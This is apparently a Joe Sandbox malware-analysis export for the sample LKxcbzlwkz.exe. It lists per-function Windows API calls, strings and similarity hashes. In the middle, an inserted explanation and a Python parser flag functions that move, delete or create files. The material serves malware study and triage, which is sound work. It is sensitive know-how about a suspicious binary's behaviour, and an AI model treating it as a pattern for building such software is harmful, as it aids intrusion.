                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
• Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
• Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: a46fed99ca1c591750973a19942bece662beca9cb15456ddb68e2b8b4ae60672
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: a46fed99ca1c591750973a19942bece662beca9cb15456ddb68e2b8b4ae60672
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                                            • API String ID: 3613100350-2852464175
                                                                                                                                                                                                                                                            • Opcode ID: 77791cc16faf9c3c2fa956c638d556c8bee090e105b4cb7d5d4efc02fa073a56
                                                                                                                                                                                                                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77791cc16faf9c3c2fa956c638d556c8bee090e105b4cb7d5d4efc02fa073a56
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                            • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                            • Opcode ID: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
                                                                                                                                                                                                                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6e4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
• Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
• Opcode Fuzzy Hash: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
• Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
• Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
• Opcode Fuzzy Hash: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
• Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
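The blocks above are Joe Sandbox's per-function summaries: the API calls the function makes itself, calls reached only through a subcall (indented, `Part of subcall function …`), the strings it references (`String ID`, several strings joined with `$`), the memory dump the code was lifted from, and the opcode and instruction fuzzy hashes used for similarity matching. Reading hundreds of such blocks by hand is slow, and the ones worth a second look here are the two that pair `MoveFileW`/`SHFileOperationW` with the wildcard `\*.*` and `CreateDirectoryW` with `\`. The Python below is an added example (mine, not code from the report or from Joe Sandbox) that parses blocks in this text format, strips the `Download File` link labels glued to the `Associated` lines, and flags functions whose own API calls create, move or delete files. The sample input is constructed from the blocks shown above with the `Associated` lists trimmed; the `FS_WRITE_APIS` watchlist and the rule that a `*` in a referenced string indicates a wildcard directory walk are my assumptions, not report fields.

```python
"""Parse Joe Sandbox per-function analysis blocks; added example, not from the report."""
from __future__ import annotations
import re
from collections import namedtuple
from dataclasses import dataclass, field

BULLET, LINK_LABEL = "\u2022", "Download File"   # the link text glued to 'Associated' lines
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# One API line: optional subcall prefix, Name.MODULE, optional (args), 'ref: ADDR'.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
# Assumed watchlist (not a report field): APIs that create, move or delete files.
FS_WRITE_APIS = {"MoveFileW", "MoveFileExW", "CopyFileW", "DeleteFileW",
                 "SHFileOperationW", "CreateDirectoryW", "RemoveDirectoryW"}

# subcall_of is the callee address when the call is only reached through a subcall.
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)    # values of 'String ID'
    dumps: list[str] = field(default_factory=list)      # .sdmp files the code came from
    meta: dict[str, str] = field(default_factory=dict)  # Similarity / IDA plugin fields


def _clean(raw: str) -> str:
    # Strip indentation, the bullet and the 'Download File' link label.
    s = raw.strip()
    if s.startswith(BULLET):
        s = s[1:].strip()
    return s[: -len(LINK_LABEL)].strip() if s.endswith(LINK_LABEL) else s


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":            # every function block opens with 'APIs'
                block = FunctionBlock()
                blocks.append(block)
            section = line
            continue
        if block is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            block.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif section == "Memory Dump Source":
            block.dumps.append(line.partition(": ")[2].split(",")[0].strip())
        elif section in ("Joe Sandbox IDA Plugin", "Similarity"):
            key, _, val = line.partition(": ")
            block.meta[key] = val
            if key == "String ID":        # referenced strings are joined with '$'
                block.strings = val.split("$")
    return blocks


def triage(blocks: list[FunctionBlock]) -> list[dict]:
    """Blocks whose own (non-subcall) calls hit FS_WRITE_APIS, with context for review."""
    hits = []
    for b in blocks:
        matched = sorted({c.name for c in b.calls if c.subcall_of is None} & FS_WRITE_APIS)
        if matched:
            hits.append({"id": b.meta.get("Instruction ID", "?")[:16], "apis": matched,
                         "strings": b.strings, "dump": b.dumps[0] if b.dumps else None,
                         # assumption: '*' in a referenced string means a wildcard walk
                         "wildcard": any("*" in s for s in b.strings)})
    return hits


# Constructed sample: three blocks in the report's format, Associated lists trimmed.
SAMPLE = r"""
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: \*.*
• Instruction ID: cfb238852dc788c6e4e4306d35388aa956c556a9525b71239849112dc74cb112
APIs
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
APIs
Similarity
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
"""
```

Run it over a saved copy of the report text (`triage(parse_blocks(open(path).read()))`) and review the hits by the call-site addresses in `ref`. Subcall entries are kept for context but excluded from matching, so a shared helper such as `GetFullPathNameW` reached from many callers does not flag every caller. The third sample block is deliberately not flagged: its strings `#requireadmin`, `#notrayicon` and `#OnAutoItStartRegister` are AutoIt script directives, a useful triage signal in its own right, but one a second, string-based rule would key on rather than this API watchlist.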
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
• __lock.LIBCMT ref: 00417981
  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
• InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
• __lock.LIBCMT ref: 004179A2
• ___addlocaleref.LIBCMT ref: 004179C0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                            • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                                                            • API String ID: 637971194-197072765
                                                                                                                                                                                                                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _memmove$_malloc
• String ID:
• API String ID: 1938898002-0
• Opcode ID: 801a918c30330fd5c8bc010afa06043b95e27693fe4c670c4d8cfbf639dcf655
• Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
• Opcode Fuzzy Hash: 801a918c30330fd5c8bc010afa06043b95e27693fe4c670c4d8cfbf639dcf655
